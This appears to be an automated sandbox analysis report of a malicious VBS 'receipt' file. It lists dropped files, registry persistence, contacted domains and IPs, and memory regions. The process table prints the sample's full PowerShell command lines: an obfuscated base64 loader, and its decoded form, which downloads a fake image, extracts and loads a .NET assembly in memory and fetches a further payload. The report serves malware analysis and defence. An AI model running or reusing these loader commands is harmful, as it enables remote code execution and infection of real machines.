Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
S94847456-receipt.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\moquenqueiro.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\VP3shFzM[1].txt
|
Unicode text, UTF-8 text, with very long lines (12241), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
Generic INItialization configuration [WIN]
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddky4e5m.sh3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eho0xezo.ow5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_litlwrvq.xcd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5ja1z11.llt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat May 4 06:48:53
2024, mtime=Sat May 4 06:48:53 2024, atime=Sat May 4 06:48:53 2024, length=45984, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\RegSvcs.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON
|
data
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\samr
|
GLS_BINARY_LSB_FIRST
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\wkssvc
|
GLS_BINARY_LSB_FIRST
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S94847456-receipt.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreeQBhDgTreG0DgTrebwB3DgTreHgDgTreLwBtDgTreG4DgTreLwBtDgTreG8DgTreYwDgTreuDgTreDcDgTreMgBlDgTreHYDgTrebDgTreBvDgTreHYDgTreZQDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreG0DgTrebwBxDgTreHUDgTreZQBuDgTreHEDgTredQBlDgTreGkDgTrecgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreFMDgTredgBjDgTreHMDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))}
}"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
xwormay8450.duckdns.org
|
|
||
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
|
172.67.215.45
|
|
|
|
http://app01.system.com.br/RDWeb/Pages/login.aspx
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://pastebin.com/raw/VP3shFzMI
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://pastsubjectivamentebin.com/raw/VP3shFz
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://uploaddeimagens.com.br
|
unknown
|
||
|
https://www.evolve27.com/nm/xwomay.txt
|
131.153.147.50
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxd
|
unknown
|
||
|
https://pastsubjectivamentebin.com/raw/VP3shFzM
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxS
|
unknown
|
||
|
https://pastebin.com/
|
unknown
|
||
|
https://pastebin.com/raw/VP3shFzMtart
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://pastebin.com/raw/VP3shFzM
|
104.20.3.235
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xwormay8450.duckdns.org
|
12.221.146.138
|
|
|
|
uploaddeimagens.com.br
|
172.67.215.45
|
|
|
|
www.evolve27.com
|
unknown
|
|
|
|
evolve27.com
|
131.153.147.50
|
||
|
pastebin.com
|
104.20.3.235
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.221.146.138
|
xwormay8450.duckdns.org
|
United States
|
|
|
|
172.67.215.45
|
uploaddeimagens.com.br
|
United States
|
|
|
|
104.20.3.235
|
pastebin.com
|
United States
|
||
|
131.153.147.50
|
evolve27.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2D41000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
20FC9405000
|
heap
|
page read and write
|
||
|
25601754000
|
trusted library allocation
|
page read and write
|
||
|
2567F296000
|
heap
|
page read and write
|
||
|
5AA43FE000
|
stack
|
page read and write
|
||
|
5990000
|
trusted library allocation
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
24899210000
|
heap
|
page read and write
|
||
|
11FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
17CFCBE0000
|
heap
|
page read and write
|
||
|
94F45FF000
|
stack
|
page read and write
|
||
|
2567E667000
|
heap
|
page read and write
|
||
|
1B89AD60000
|
heap
|
page read and write
|
||
|
253BA297000
|
heap
|
page read and write
|
||
|
17CFCBC0000
|
heap
|
page read and write
|
||
|
25601530000
|
trusted library allocation
|
page read and write
|
||
|
253B84BE000
|
heap
|
page read and write
|
||
|
253B8570000
|
heap
|
page read and write
|
||
|
7FF848C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
5844000
|
trusted library allocation
|
page read and write
|
||
|
1B898C9C000
|
heap
|
page read and write
|
||
|
253B8504000
|
heap
|
page read and write
|
||
|
1B898C9A000
|
heap
|
page read and write
|
||
|
20FC70AC000
|
heap
|
page read and write
|
||
|
17CFECD5000
|
heap
|
page read and write
|
||
|
2D70000
|
trusted library allocation
|
page read and write
|
||
|
253BA255000
|
heap
|
page read and write
|
||
|
1B898C9C000
|
heap
|
page read and write
|
||
|
17CFEBE7000
|
heap
|
page read and write
|
||
|
20FC905B000
|
heap
|
page read and write
|
||
|
248AB260000
|
trusted library allocation
|
page read and write
|
||
|
253BA5B6000
|
heap
|
page read and write
|
||
|
253BA251000
|
heap
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
24899010000
|
heap
|
page read and write
|
||
|
17CFECD1000
|
heap
|
page read and write
|
||
|
253B852F000
|
heap
|
page read and write
|
||
|
253BA5DB000
|
heap
|
page read and write
|
||
|
1B89AD65000
|
heap
|
page read and write
|
||
|
5890000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
683C1FE000
|
stack
|
page read and write
|
||
|
AEEC03F000
|
stack
|
page read and write
|
||
|
1B89AC67000
|
heap
|
page read and write
|
||
|
2489CEEB000
|
trusted library allocation
|
page read and write
|
||
|
1B89ACA0000
|
heap
|
page read and write
|
||
|
253BAE4D000
|
heap
|
page read and write
|
||
|
2560157F000
|
trusted library allocation
|
page read and write
|
||
|
20FC708F000
|
heap
|
page read and write
|
||
|
683C17E000
|
stack
|
page read and write
|
||
|
2489B647000
|
trusted library allocation
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
EF0000
|
heap
|
page read and write
|
||
|
2489B6A7000
|
trusted library allocation
|
page read and write
|
||
|
253BA638000
|
heap
|
page read and write
|
||
|
17CFE710000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
CF7000
|
stack
|
page read and write
|
||
|
25601536000
|
trusted library allocation
|
page read and write
|
||
|
2489916F000
|
heap
|
page read and write
|
||
|
253BAEA4000
|
heap
|
page read and write
|
||
|
253B85C0000
|
heap
|
page read and write
|
||
|
2567E6D0000
|
heap
|
page read and write
|
||
|
5A11000
|
trusted library allocation
|
page read and write
|
||
|
253B853F000
|
heap
|
page read and write
|
||
|
7FF848CB6000
|
trusted library allocation
|
page execute and read and write
|
||
|
5AA3D35000
|
stack
|
page read and write
|
||
|
5C0E000
|
stack
|
page read and write
|
||
|
253B84DA000
|
heap
|
page read and write
|
||
|
1B898C68000
|
heap
|
page read and write
|
||
|
1B89ACB9000
|
heap
|
page read and write
|
||
|
2567F298000
|
heap
|
page read and write
|
||
|
94F43FF000
|
stack
|
page read and write
|
||
|
17CFEBD4000
|
heap
|
page read and write
|
||
|
253BA5AC000
|
heap
|
page read and write
|
||
|
5A00000
|
heap
|
page read and write
|
||
|
1B898BE0000
|
heap
|
page read and write
|
||
|
94F3F8A000
|
stack
|
page read and write
|
||
|
253B8570000
|
heap
|
page read and write
|
||
|
1B89AB61000
|
heap
|
page read and write
|
||
|
2489915B000
|
heap
|
page read and write
|
||
|
1B898C8A000
|
heap
|
page read and write
|
||
|
253BA638000
|
heap
|
page read and write
|
||
|
24899196000
|
heap
|
page read and write
|
||
|
253BA5F3000
|
heap
|
page read and write
|
||
|
1B89ACB3000
|
heap
|
page read and write
|
||
|
AEEBDFD000
|
stack
|
page read and write
|
||
|
2567F2B0000
|
heap
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
|
17CFCC10000
|
heap
|
page read and write
|
||
|
25601A0C000
|
trusted library allocation
|
page read and write
|
||
|
2560189E000
|
trusted library allocation
|
page read and write
|
||
|
217EFC70000
|
heap
|
page read and write
|
||
|
1B898C80000
|
heap
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20FC9091000
|
heap
|
page read and write
|
||
|
2567E5C0000
|
heap
|
page read and write
|
||
|
253BAD0E000
|
heap
|
page read and write
|
||
|
52F0000
|
heap
|
page read and write
|
||
|
2489914F000
|
heap
|
page read and write
|
||
|
253BAD7D000
|
heap
|
page read and write
|
||
|
1B898C89000
|
heap
|
page read and write
|
||
|
17CFEAD1000
|
heap
|
page read and write
|
||
|
5861000
|
trusted library allocation
|
page read and write
|
||
|
2DB2000
|
trusted library allocation
|
page read and write
|
||
|
17CFEBFB000
|
heap
|
page read and write
|
||
|
